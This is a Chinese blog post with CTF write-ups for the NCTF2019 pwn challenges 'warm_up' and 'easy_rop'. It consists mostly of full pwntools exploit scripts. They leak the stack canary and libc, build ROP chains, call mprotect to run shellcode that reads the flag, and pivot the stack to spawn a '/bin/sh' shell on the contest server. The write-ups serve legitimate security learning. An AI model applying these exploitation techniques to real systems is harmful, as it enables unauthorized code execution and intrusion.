NCTF2019 -- PWN部分writeup

最新推荐文章于 2024-03-24 07:00:00 发布
最新推荐文章于 2024-03-24 07:00:00 发布
阅读量1.2k 收藏
点赞数
分类专栏: pwn 文章标签: pwn NCTF2019 easy rop warm up
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41988448/article/details/103273612
版权

pwn学习总结(二) —— PWN部分writeup

warmup

查看程序防护
checksec
查看反汇编
main
sub_400a06
sub_400ab6
已知条件

  1. 开启了溢出检测
  2. 开启了沙盒模式,只能调用libc中的open | read | write等读写函数
  3. 可以通过leak canary绕过溢出检测

EXP

#-*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"

elf  = ELF('./warm_up')
libc = ELF('./libc-2.23.so')

r = remote('139.129.76.65', 50007)

r.recvuntil('warm up!!!\n')
#距离canary24个字节,换行符0x0a会占据canary最后一个字节,使得canary发生泄露
r.sendline('a'*24)
r.recv(25)  #丢弃前25个字节,包括用于泄露canary的'\x0a'
canary = '\x00' + r.recv(7)
print(hex(u64(canary)))

pop_rdi_ret     = 0x400bc3
pop_rsi_r15_ret = 0x400bc1
start_addr      = 0x400910
bss_addr        = elf.bss()
puts_plt        = elf.symbols['puts']
libc_start_main_got = elf.got['__libc_start_main']

#leak libc
payload  = 'a'*24 + canary + 'b'*8
payload += p64(pop_rdi_ret)
payload += p64(libc_start_main_got)
payload += p64(puts_plt)
payload += p64(start_addr)

r.recvuntil(' ?')
r.sendline(payload)

libc_start_main = u64(r.recv(6).ljust(8,'\x00'))
#print('libc_start_main = ' + str(hex(libc_start_main)))
libc_base = libc_start_main - libc.symbols['__libc_start_main']

gets        = libc_base + libc.symbols['gets']
mprotect    = libc_base + libc.symbols['mprotect']
pop_rdx_ret = libc_base + libc.search(asm("pop rdx\nret")).next()

r.recvuntil('warm up!!!\n')
r.sendline('a')

payload  = 'a'*0x18 + canary + 'b'*8
#向bss + 0x500位置写入shellcode
payload += p64(pop_rdi_ret) + p64(bss_addr + 0x500) + p64(gets)
#构造mprotect,更改内存保护属性
payload += p64(pop_rdx_ret)     + p64(7)                   #设置保护属性
payload += p64(pop_rsi_r15_ret) + p64(0x1500) + p64(0)     #设置大小
payload += p64(pop_rdi_ret)     + p64((bss_addr>>12)<<12)  #设置起始地址
payload += p64(mprotect)   #调用mprotect
#修改内存保护属性后,令RIP指向下方构造的shellcode
payload += p64(bss_addr + 0x500)

r.recvuntil(' ?')
r.sendline(payload)

payload  = shellcraft.open("flag")
#将远程flag文件内容写入缓冲区,open成功时返回值为3
#                          fd  address          size
payload += shellcraft.read( 3, bss_addr+0x100, 0x30)
payload += shellcraft.write(1, bss_addr+0x100, 0x30)

r.sendline(asm(payload))
r.interactive()

由于服务器在写完wp后连不上了,这里放一张本地执行成功的截图,环境:ubuntu16.04
flag

easy_rop

查看程序防护
在这里插入图片描述
查看反汇编
反汇编
调试的时候发现main函数的rbp居然是pie,而返回地址下面第四行是main函数自己的头部指针
pie
已知条件

  1. 存在栈溢出,大小为4个栈单元
  2. 开启了canary保护,可以用’+'号绕过
  3. main函数的 rbp 为 pie(基址)
  4. main函数的返回地址下面存在main函数头部指针

解题思路

  1. 使用’+'号绕过canary值
  2. 劫持pie,通过pie和静态偏移得到想要的真实地址
  3. 第一次执行main函数时,迁移rbp指向 unk_201420 - 8 的位置
    rsp指向main函数头部指针,retn后再次执行main函数
  4. 第二次执行main函数时,迁移rsp指向 unk_201420 的位置
  5. 通过main函数的read函数向unk_201420写入rop链,功能:
    1. leak libc,得到版本信息,计算system函数和’/bin/sh’字符串在libc中的偏移
    2. 调用万能gadget,进行任意函数执行,由于leak libc后要进行利用的话需要计算偏移后再次写入rop链,所以这里使用read函数在下方构造system(’/bin/sh’)即可getshell

注意:exp中没有对负数进行处理,可能需要多打几次才行

Leak Libc EXP

#-*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'

elf   = ELF('./easy_rop')

#r = process('./easy_rop')
r = remote('139.129.76.65', 50002)

'''first main'''
r.recvuntil('number 0: ')
#bypass canary
for i in range(0,30):
	r.sendline('+')

#get pie
r.recvuntil('number 28 = ')
pie_l8 = int(r.recvuntil('\n',True), 10)
r.recvuntil('number 29 = ')
pie_h8  = int(r.recvuntil('\n',True), 10)
pie = (pie_h8 << 32) + pie_l8 - 0xb40

def send64(num):
	#low  4byte
	if num % 0x100000000 > 0x7fffffff:
		r.sendlineafter(':', str((-1 * num) % 0x100000000))
	else:
		r.sendlineafter(':', str(num % 0x100000000))
	#high 4byte
	r.sendlineafter(':', str(num >> 32))

new_stack      = pie + 0x201420 - 8
pop_rdi_ret    = pie + 0xba3
general_gadget = pie + 0xb80
leave_ret      = pie + 0xb31
pop_rbp_r14_r15_ret = pie + 0xb9f
pop_rbx_rbp_r12_r13_r14_r15_ret = pie + 0xb9a

#return to main
#the end rsp point to the main
send64(pop_rbp_r14_r15_ret)
#rbp to new stack
send64(new_stack)
r.sendlineafter('name?\n', '1')

'''secend main'''
r.recvuntil('number 0: ')
for i in range(0,28):
	r.sendline('+')

#rsp to new stack
#rbp to new stack-8(pie + 0x201420)
send64(new_stack)	#number 28 & 29 -- rbp
send64(leave_ret)	#number 30 & 31 -- return address
r.sendlineafter('number 32: ','++')  # number 32 & 33

r.recvuntil('name?\n',True)
#leak libc
payload  = p64(pop_rdi_ret)
payload += p64(pie + elf.got['__libc_start_main'])
payload += p64(pie + elf.plt['puts'])

r.sendline(payload)
libc_start_main = u64(r.recv(6).ljust(8, '\x00'))
print('libc_start_main = ' + hex(libc_start_main))

r.interactive()

leak_libc
通过后三位偏移,使用在线网站libc database search搜索libc版本
libc_database_search
Getshell EXP
本地一直无法成功,连上服务器能够成功getshell,暂时未定位到问题所在

#-*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'

elf   = ELF('./easy_rop')

#r = process('./easy_rop')
r = remote('139.129.76.65', 50002)

'''first main'''
r.recvuntil('number 0: ')
#bypass canary
for i in range(0,30):
	r.sendline('+')

#get pie
r.recvuntil('number 28 = ')
pie_l8 = int(r.recvuntil('\n',True), 10)
r.recvuntil('number 29 = ')
pie_h8  = int(r.recvuntil('\n',True), 10)
pie = (pie_h8 << 32) + pie_l8 - 0xb40

def send64(num):
	#low  4byte
	if num % 0x100000000 > 0x7fffffff:
		r.sendlineafter(':', str((-1 * num) % 0x100000000))
	else:
		r.sendlineafter(':', str(num % 0x100000000))
	#high 4byte
	r.sendlineafter(':', str(num >> 32))

new_stack      = pie + 0x201420 - 8
pop_rdi_ret    = pie + 0xba3
general_gadget = pie + 0xb80
leave_ret      = pie + 0xb31
pop_rbp_r14_r15_ret = pie + 0xb9f
pop_rbx_rbp_r12_r13_r14_r15_ret = pie + 0xb9a

#return to main
#the end rsp point to the main
send64(pop_rbp_r14_r15_ret)
#rbp to new stack
send64(new_stack)
r.sendlineafter('name?\n', '1')

'''secend main'''
r.recvuntil('number 0: ')
for i in range(0,28):
	r.sendline('+')

#rsp to new stack
#rbp to new stack-8(pie + 0x201420)
send64(new_stack)	#number 28 & 29 -- rbp
send64(leave_ret)	#number 30 & 31 -- return address
r.sendlineafter('number 32: ','++')  # number 32 & 33

r.recvuntil('name?\n',True)
#leak libc
payload  = p64(pop_rdi_ret)
payload += p64(pie + elf.got['__libc_start_main'])
payload += p64(pie + elf.plt['puts'])

#general gadget
payload += p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
#          0        1        function                     parameter3   parameter2           parameter1
payload += p64(0) + p64(1) + p64(pie + elf.got['read']) + p64(0x666) + p64(new_stack + 8) + p64(0)
payload += p64(general_gadget) #general gadget address

r.sendline(payload)
#get libc_start_main
libc_start_main = u64(r.recv(6).ljust(8, '\x00'))
#print('libc_start_main = ' + hex(libc_start_main))
system_addr = libc_start_main + 0x24c50
bin_sh      = libc_start_main + 0x16c617

payload  = 'a'*80		#rsp offset
payload += p64(pop_rdi_ret)
payload += p64(bin_sh)
payload += p64(system_addr)

r.sendline(payload)
r.interactive()
lzyddf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【SCTF&&CCTF 2016】 PWN_WRITEUP
wintersun的地带
05-15 3680
这里是摘要吗
攻防世界 pwn进阶区解法 write up(一)
qq_46441427的博客
03-01 367
实时数据监测 找信息 没有发现canary,没有开启PIE和NX 查看ida 发现有一个printf,这里是fgets,可能会用到格式化字符串漏洞,运行一下程序 结合ida的分析我们可知,要把这个值改成0x2223322,那结合之前的printf,可以确定是格式化字符串漏洞 给了我们地址,那我们的payload就以地址为开头,因为是p32,所以后面35795746要减4,构成%35795742d%偏移量n$ 然后确定偏移量: 总共,从A到41包括A有12个,偏移量=12 所以得到payload
[NCTF2019]True XML cookbook
qq_52907838的博客
08-04 2464
打开环境,看到熟悉的页面,和前面的[NCTF2019]Fake XML cookbook页面一样,应该也是XXE漏洞,这里再介绍一下XXE漏洞: XXE(XML External Entity Injection)全称为XML外部实体注入。 XML是什么? XML指可扩展标记语言(EXtensible Markup Language),其设计宗旨是传输数据,而不是显示数据,用来结构化、存储以及传输信息,它没有预定义的标签。XML 和 HTML 之间的差异是什么? 设计目的不同:XML 被设计用来传输
[NCTF2019]SQLi ---不会编程的崽
不会编程的崽的博客
03-24 740
过滤有点多哦,而且我还没放完。单引号被过滤了,一刀砍在大动脉。但是路堵了,不代表窗户也封了。思路的确是这个思路,不过常规盲注与常规注入关键字被过滤差不多,看了大佬wp,说重点在regexp上。因为是正则匹配,所以在脚本中,一定要过滤掉通配符("*","+","?而且这个passwd列名,是猜的。很直接哦,给出了sql查询语句。简单扫描一下,robots.txt还能访问。过滤了一些东西,而且只要密码对了就能拿到flag。含义:匹配当前表下,passwd列里的内容是否为YO或者yo。自己写的脚本有点烂,见谅。
hackme inndy pwn echo2 writeup
charlie_heng的专栏
12-30 844
这题做了好久。。。但是学到了很多很骚的思路 做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。 首先,用checksec看了下,发现开了pie。。。那就不能简单的改got表,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针 第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用p...
2017广东红帽杯pwn1_writeup:简单ROP
ACdream
05-09 4115
先来正能量一波:作为一个一直没入门pwn的小菜鸟,这一段时间一直被学弟按在地上摩擦很不爽很不爽~~~~~~~~ ------------------------------------------------------------------------------------ 先给出几个学习链接: 一步一步ROP:x86 一步一步ROP:x64 论文: Return-O
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
虹膜图像识别matlab程序
10-09
%用霍夫曼方法对上述像素概率编码 b=fliplr(sort(b));%按降序排列 T=b; [m,n]=size(b); B=zeros(n,n-1);%空的编码表(矩阵) for i=1:n B(i,1)=T(i);%生成编码表的第一列 end r=B(i,1)+B(i-1,1);%最后两个元素相加 T(n-1)=r; T(n)=0; T=fliplr(sort(T)); t=n-1; for j=2:n-1%生成编码表的其他各列 for i=1:t B(i,j)=T(i); end K=find(T==r); B(n,j)=K(end);%从第二列开始,每列的最后一个元素记录特征元素在该列的位置 r=(B(t-1,j)+B(t,j));%最后两个元素相加 T(t-1)=r; %把相边的值排在后面 T(t)=0; %把最后一个数清空 T=fliplr(sort(T)); %重新进行降序排列 t=t-1; end END1=sym('[0,1]');%给最后一列的元素编码 END=END1; t=3; d=1;
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
PWN刷题】Pwnable-calc、Buu-roarctf_2019_easyrop
QYbudong的博客
05-06 1478
今天事略多,做一道pwnable+一道有分的buu吧一、Buu-roarctf_2019_easyrop
[NCTF2019]Reverse(des子密钥)
weixin_44110537的博客
08-08 1004
encrypt import os import pyDes flag = "NCTF{******************************************}" key = os.urandom(8) d = pyDes.des(key) cipher = d.encrypt(flag.encode()) with open('cipher', 'wb') as f: f.write(cipher) # Leak: d.Kn[10] == [0, 1, 0, 0, 0, 1
[NCTF2019]Reverse(des已知一轮的子密钥)
m0_62506844的博客
04-16 393
import os import pyDes flag = "NCTF{******************************************}" key = os.urandom(8) d = pyDes.des(key) cipher = d.encrypt(flag.encode()) with open('cipher', 'wb') as f: f.write(cipher) # Leak: d.Kn[10] == [0, 1, 0, 0, 0, 1, 0...
NCTF 2019 Re Writeup(四题)
siphre
11-25 888
reverse 一、DEBUG ELF动态调试,flag长度24字节,用户输入的字符串跟经过处理后的字符串s做校验。因为变量s是经过处理的,得在cmp dl,al下断看eax寄存器的值,可以看到最终比较的时候s的值。 手抄s的值出来,再python翻译成字符串即可。 flag=[0x4E,0x43,0x54,0x46,0x7b,0x6a,0x75,0x73,0x74,0x5f,0x6...
mrctf2020_easyrop
z1r0的博客
04-10 354
mrctf2020_easyrop 查看保护 简单题 用hehe和byby这两个函数配合起来rop就行 from pwn import * from time import sleep context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1
攻防世界PWNEasyPwn题解
seaaseesa的博客
11-15 3642
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过不断尝试不同的字符,构造SQL语句进行盲注,判断是否成功绕过过滤。引用\[3\]提供了一个Python脚本的示例,可以用来自动化进行尝试。该脚本通过构造不同长度的payload,逐位尝试密码的每一位字符,直到获取到完整的密码。 #### 引用[.reference_title] - *1* [[NCTF2019]SQLi --BUUCTF --详解](https://blog.csdn.net/l2872253606/article/details/125265138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[NCTF2019]SQLi(Regexp注入)](https://blog.csdn.net/weixin_45669205/article/details/116137824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[NCTF2019]SQLi](https://blog.csdn.net/shinygod/article/details/124100832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值